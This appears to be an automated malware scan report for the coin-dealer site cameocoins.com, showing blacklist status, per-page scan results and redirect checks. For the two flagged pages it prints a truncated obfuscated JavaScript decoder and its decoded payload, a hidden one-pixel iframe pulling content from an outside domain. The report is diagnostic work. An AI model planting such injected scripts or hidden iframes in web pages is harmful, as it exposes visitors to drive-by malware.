Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cameocoins.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cameocoins.com/ | 200 OK Content-Length: 23268 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function tf8481a490346(tff11842){var od39d99='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var k4bcf8b='';var w4a86277,a42391b2,seabe3c1,kebe8caf,kc3082,j7d379e4,la04a8df8;var hbdbb9d4c=0;do{kebe8caf=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));kc3082=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));j7d379e4=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));la04a8df8=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));w4a86277=(kebe8caf<<2)|(kc3082>>4);a42391b2=((kc3082& Decoded script: <iframe src="http://yt6tyg.cn/1/index.php" width="1" height="1" frameborder="0"></iframe> Antivirus reports:
| ||
http://cameocoins.com/assets/mm_menu.js | 200 OK Content-Length: 29972 Content-Type: application/javascript | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 19067 Content-Type: application/x-javascript | clean |
http://cameocoins.com/index.html | 200 OK Content-Length: 23268 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function tf8481a490346(tff11842){var od39d99='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var k4bcf8b='';var w4a86277,a42391b2,seabe3c1,kebe8caf,kc3082,j7d379e4,la04a8df8;var hbdbb9d4c=0;do{kebe8caf=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));kc3082=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));j7d379e4=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));la04a8df8=od39d99.indexOf(tff11842.charAt(hbdbb9d4c++));w4a86277=(kebe8caf<<2)|(kc3082>>4);a42391b2=((kc3082& Decoded script: <iframe src="http://yt6tyg.cn/1/index.php" width="1" height="1" frameborder="0"></iframe> Antivirus reports:
| ||
http://cameocoins.com/specials.html | 200 OK Content-Length: 18836 Content-Type: text/html | clean |
http://cameocoins.com/test404page.js | 404 Not Found Content-Length: 395 Content-Type: text/html | clean |
http://cameocoins.com/shows.html | 200 OK Content-Length: 18831 Content-Type: text/html | clean |
http://cameocoins.com/wantlist.html | 200 OK Content-Length: 19497 Content-Type: text/html | clean |
http://cameocoins.com/ebay.html | 200 OK Content-Length: 19917 Content-Type: text/html | clean |
http://cameocoins.com/order.html | 200 OK Content-Length: 20688 Content-Type: text/html | clean |
http://cameocoins.com/sell.html | 200 OK Content-Length: 19324 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cameocoins.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 00:06:36 GMT
Accept-Ranges: bytes
ETag: "3025b-5ae4-471fa2583cd00"
Server: nginx/1.7.5
Content-Length: 23268
Content-Type: text/html
Last-Modified: Tue, 25 Aug 2009 16:51:32 GMT
...23268 bytes of data.
GET / HTTP/1.1
Host: cameocoins.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 13 Dec 2014 00:06:36 GMT
Accept-Ranges: bytes
ETag: "3025b-5ae4-471fa2583cd00"
Server: nginx/1.7.5
Content-Length: 23268
Content-Type: text/html
Last-Modified: Tue, 25 Aug 2009 16:51:32 GMT
...23268 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cameocoins.com
Referer: http://www.google.com/search?q=cameocoins.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cameocoins.com
Referer: http://www.google.com/search?q=cameocoins.com
Result:
The result is similar to the first query. There are no suspicious redirects found.